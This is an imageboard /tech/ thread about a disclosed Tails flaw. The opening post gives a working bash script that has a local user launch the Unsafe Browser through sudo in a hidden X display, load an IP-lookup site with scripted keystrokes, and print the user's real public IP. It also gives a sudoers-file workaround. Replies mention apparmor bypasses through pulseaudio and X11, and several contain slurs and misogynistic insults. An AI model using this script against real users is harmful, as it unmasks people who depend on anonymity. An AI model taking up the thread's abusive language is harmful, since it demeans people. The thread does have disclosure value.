[ / / / / / / / / / / / / / ] [ dir / 4chon / arepa / g / hisrol / icup / leftpol / vg / vichan ][Options][ watchlist ]

/tech/ - Technology

You can now write text to your AI-generated image at https://aiproto.com It is currently free to use for Proto members.
Name
Email
Subject
Comment *
File
Select/drop/paste files here
Password (Randomized for file and post deletion; you may also set your own.)
* = required field[▶ Show post options & limits]
Confused? See the FAQ.
Expand all images

File (hide): 9a34cd2fcf2d0ae⋯.png (49.9 KB, 1024x408, 128:51, tails.png) (h) (u)

[–]

 No.928637>>928650 >>928713 >>928880 >>929192 [Watch Thread][Show All Posts]

A compromised local user on Tails can get your pubic IP, no privilege escalation required: https://labs.riseup.net/code/issues/15635


#!/bin/bash

export DISPLAY=:69
mv /run/user/1000/bus{,.bak}

Xvfb $DISPLAY -r -nocursor & xpid=$!
sleep 1

sudo DISPLAY=$DISPLAY unsafe-browser &>/dev/null &

xdotool search --sync --name zenity 1>/dev/null
xdotool key --delay 200 Tab Return

xdotool search --sync --name Unsafe 1>/dev/null
xdotool key --delay 200 ctrl+l
xdotool type --delay 200 www.yourip.us
xdotool key --delay 200 Return

xdotool search --sync --name Your getwindowname | awk '{print $5}'

mv /run/user/1000/bus{.bak,}
kill "$xpid"
exit 0

Workaround: delete /etc/sudoers.d/zzz_unsafe-browser after start up

 No.928642>>929035

What's the unsafe browser even for? Capture portals?


 No.928650

>>928637 (OP)

Did you know that Tails updates very fast for obvious security reasons?

I think that leak will be fixed in 3.8.


 No.928665>>928668

If someone compromises Tor Browser, they would still need to get around apparmor to execute something like this.


 No.928668>>928717

>>928665

You can bypass Tor Browser's apparmor policy through pulseaudio or x11, there are PoCs out. Pulseaudio has an API that allows connected programs to execute commands, and pulseaudio doesn't have an apparmor profile on Tails yet. X11 is a nightmare and won't be fixed until Wayland.


 No.928713>>928714

>>928637 (OP)

>pubic IP

>pubic

kek


 No.928714>>928763

>>928713

He obviously means public facing. Don't try to feign intelligence through sophistry.


 No.928717

>>928668

How's Sway WM?


 No.928763>>929282 >>929297 >>930022

File (hide): 93084316f9d639e⋯.png (446.42 KB, 1154x1608, 577:804, condescending.png) (h) (u)

>>928714

>obviously

stop using condescending language to me, shitlord


 No.928835>>928866 >>929023

what do you expect when every Linux skiddie in the world unironically plays around with things like sudo and X's retarded undocumented security architecture. sandboxing in linux is a joke. 99% of linux skiddies will just run X with default settings which allows the server (i.e, your entire desktop and everything you do) to be controlled over TCP. how is this relevant to the tails IP leaking exploit? because privilege separation is a much easier problem to solve than avoiding leaking the IP address yet they can't even get _that_ right


 No.928866

>>928835

What's a 'skiddie'?


 No.928880

File (hide): 158d8ea4f448698⋯.jpg (Spoiler Image, 240.73 KB, 700x1000, 7:10, 1a4cf7e16ddfb011b4ff8797ba….jpg) (h) (u)

>>928637 (OP)

>A compromised local user on Tails can get your pubic IP

Oh dear, my pubic IP


 No.929023

>>928835

I wouldn't bother trying to secure X, it's pointless.


 No.929035


 No.929192>>929199

>>928637 (OP)

>local user

So, someone would have to physically be next to me or use JavaScript (which is by default blocked) to do this? It doesn't seem like a big deal. Is it getting worked on?

>delete /etc/sudoers.d/zzz_unsafe-browser after start up

I guess a post-boot script could be made to delete this, as a temporary solution.


 No.929199

>>929192

If any application is exploited (browser, totem, libreoffice, archiver, pidgin, etc) they could get your IP. Normally, they would need to chain a privilege escalation exploit afterwards to leak your IP.


 No.929202>>929212

What in the name of Christ is xdotool?


 No.929212

>>929202

It let's you script stuff like pressing keys or moving the mouse.


 No.929282

>>928763

>dat pic

>"""subtly condescending"""

Really, fuck off, self-important roastie bitch. Everyone should be as offensive as possible to these cunts and hopefully they all have a stroke or at the very least fuck off into unicorn land where they belong.


 No.929297>>929301

>>928763

She's right. If you aren't willing to stop being a huge faggot all the time people will not respond, further prolonging anything from being fixed.


 No.929301

>>929297

Who cares if some retard's question doesn't get answered or if some pajeet's problem doesn't get fixed? People asking questions have literally no leverage over anybody.


 No.929727

A local users could log your keys, gather information about your MAC address/router address MAC, and hardware serial numbers. It's best to use something like Qubes-Whonix if you want to prevent leaks. It would have no internet access except through a Tor gateway running in another VM.

A VM escape or Tor exploits would be needed to leak your IP. Tails is only good because of it's amnesic feature.


 No.929742

File (hide): 21fffa95519d23d⋯.jpeg (8.86 KB, 221x228, 221:228, Jabber.jpeg) (h) (u)

File (hide): 27173324460b78e⋯.jpeg (5.28 KB, 275x183, 275:183, snowden.jpeg) (h) (u)

File (hide): 0eeb21233207777⋯.jpeg (6.4 KB, 299x168, 299:168, tails.jpeg) (h) (u)

Welcome offical conference Tails in XMPP!

Here are the developers:

tails@conference.riseup.net

tails-dev@conference.riseup.net

Create XMPP account https://404.city/

Client for Windows or Linux https://gajim.org/downloads.php

Client for Android https://play.google.com/store/apps/details?id=eu.siacs.conversations.legacy


 No.930022

>>928763

women "in tech"




[Return][Go to top][Catalog][Screencap][Nerve Center][Cancer][Update] ( Scroll to new posts) ( Auto) 5
23 replies | 3 images | Page ???
[Post a Reply]
[ / / / / / / / / / / / / / ] [ dir / 4chon / arepa / g / hisrol / icup / leftpol / vg / vichan ][ watchlist ]